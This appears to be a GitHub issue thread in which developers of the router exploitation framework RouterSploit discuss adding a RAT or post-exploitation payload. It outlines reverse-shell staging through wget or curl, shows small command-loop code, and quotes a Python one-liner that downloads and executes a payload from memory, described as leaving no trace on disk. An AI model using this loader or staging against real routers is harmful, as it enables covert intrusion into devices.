RouterSploit should have a build-in RAT, similar to meterpreter.

[nymx]

I'm not sure if this counts as an issue, really, but I feel that this framework could be greatly improved by the addition of a RAT, similar to meterpreter, but written in python, perhaps.

[MatthewHKnight]

Eh hate the word RAT however backdoor or shell would be interesting I've heard their is a way to drop a busybox like thing on some routers

[nymx]

I've been writing such a tool recently in python, and I'd be happy to contribute something similar to this project.

[lucyoa]

Sure @Bouncingbunny , we would love to see your contribution to the project.

In case of RAT what do you exactly think of? We are working on "reverse shells" functionality which is going to work as follow:

1. Server that hosts reverse shell binary is set up
2. Action responsible for transferring binary to the device is issued (for example command injection)
3. Binary is executed on the device and reverse shell connects directly to the attacker

There are numerous ways of transfering binary to the device and it depends on specific device and available tools:

• wget method
• bash method
• openssl method
• curl method
• etc.

[nymx]

@lucyoa I was thinking that it could execute some Python (I believe that most/all routers would have a python interpreter.) with rce. Said Python one-liner downloads and executes a larger Python module from memory. This larger module could do port scanning, open backdoors, open a vpn/ssh tunnel, etc.

Also, you wouldn't have to compile a binary for each architecture if you wrote it in python.

[lucyoa]

@Bouncingbunny Not all routers have python installed. I think your module is quite interesting and it could be something like extension to basic cmd shell. User could run this manually when python is present - e.g. "run rat" and command would invoke your RAT that provides advanced post-exploitation functions.

[JPaulMora]

Something to note which I have had issues before (specially with embedded devices) Is that OS is usually mounted (if not made) read-only. Besides this limitation, I do think a Router-RAT could be useful to make.. in which case I would not limit myself to a single language for scripting since different routers have different capabilities.

I would suggest making a common command sintaxis for the RRAT and then code it in multiple languages or even router-specific versions. That way we could let the script manage the tasks/limitations without giving much trouble to the user.

[nymx]

@jpaulmora If the file system is read-only, then a memory-only rat would be best.

[JPaulMora]

@Bouncingbunny Exactly!

[lucyoa]

Currently for RCE exploits we have custom made command loop:

    def command_loop(self):
        while 1:
            cmd = raw_input("cmd > ")

            if cmd in ['exit', 'quit']:
                return

            print self.execute(cmd)

I think you can try to change it to something like that:

    def command_loop(self):
        while 1:
            cmd = raw_input("cmd > ")

            if cmd == "run rat":
                self.execute(your_module_rat.payload)

            if cmd in ['exit', 'quit']:
                return

            print self.execute(cmd)

And your imported rat module would do the all magic.

[nymx]

@lucyoa While that would work, I feel like it would seem like a "hacky" solution. I think that an rce handler should be added to the core and if the target has python, it will drop into a handler for the RAT. Otherwise it would drop into a cmd shell.

[lucyoa]

@Bouncingbunny Yes you are right, but for now we need to increase identification and exploitation capabilities of the framework to cover more devices. This little hack let you work on RAT that can be tested by users and when the time comes for post-exploitation functions we will add this to the core.

[nymx]

@lucyoa Very well. While you guys work on router exploitation, I'll start development on post-exploitation. I'm not an amazing programmer, so it might take a bit, though. I also need to think of a name for it, so if any of you have any ideas, please share.

[n1nj4sec]

are you looking for pupy ? ;)

[nymx]

@n1nj4sec pupy is so cool, but can it be deployed on a target without downloading it onto that target?

[jayzeng]

Or https://github.com/jonathanslenders/python-prompt-toolkit ?

[n1nj4sec]

Yes, I think it can be run entirely from memory on linux with very little work, I already planned of dooing a python oneliner loader

[nymx]

@n1nj4sec Awesome! Please do that! Doesn't a significant amount of the features of pupy require the part written in c, though? How do you plan on loading an executable from memory with python?

[n1nj4sec]

done ! here is a poc https://github.com/n1nj4sec/pupy/blob/dev/pupy/oneliner_poc.py All it needs to execute pupy from memory (including the required libraries like rpyc) is :

python -c 'import urllib;exec urllib.urlopen("http://127.0.0.1:8080/oneliner.py").read()'

no trace on the disk. It is chained with a ssh remote port forwarding (-R 8080:127.0.0.1:8080) in my case

[n1nj4sec]

@Bouncingbunny the part written in C is only necessary for loading .pyd or .so libraries from memory. pupy doesn't need that part if you don't use process migration features, but all other features are still available as long as it only require pure python packages (.py, .pyc) that can easily be loaded from memory

[awnumar]

A properly implemented reverse shell that doesn't die with interactive programs, cd, infinite loops, and errors would be good enough. There's really no need for any more functionality. It's a router mate. Why do you need a RAT?

[maxzinkus]

For RCE exploits, there should probably be pluggable payloads, one of which can be the currently implemented shell loop. This would be ideal for networks with IDS/IPS when shell commands over the wire will throw red flags everywhere.

Also, this opens the way for future payload development, and perhaps the inclusion of a payload encoder, and then somewhere down the road a pluggable encoder option.

HOWEVER it really depends on how much you want this project to morph into being only a subset of metasploit. There are pros and cons to going down that path.

[JPaulMora]

I agree, but based in interface and all I believe this is a router targeted version of metasploit with the advantage of being python based (Have you tried installing metasploit? its a complete headache no matter the platform, ruby version, rebuild, it breaks again, aaaaah!).

wether this will evolve to a multipurpose exploit kit like metasploit, well, thats to the contributors and cloners to decide.

[bcook-r7]

We are working on a new native cross-platform meterpreter-like payload here: https://github.com/rapid7/mettle and have in-memory and stageless versions for a few different architectures. The design is such that it's resident footprint is small (< 1MB), and the event loop should be able to support more than the synchronous meterpreter TLV protocol as well.

As this project gets larger and larger (hope it does!), hoping we can make it work with both Metasploit and Routersploit.

[lucyoa]

@bcook-r7 It looks nice. Gonna check it out. Thanks!

[timwr]

@lucyoa :)

[busterb]

By the way, we have now integrated this as the standard native Linux meterpreter in Metasploit - supports staged, stageless, reverse tcp/http/s. I'd be happy discussing how to make it useful to your project as well, since it's fairly project-agnostic code.

[lucyoa]

Hey @busterb, thanks for that! We are definitely interested in adding Mettle to Routersploit project. I will try to play with it and figure out how it can be incorporated into existing framework.

[TormentedSoul666]

A proper CLI/API would be much more benificial. I really enjoy the nowadays approach to build pen testing tools in a modulary way and since the rise of Python imagine the possibilities of implementing those kinda standardized frameworks as modules in other projects.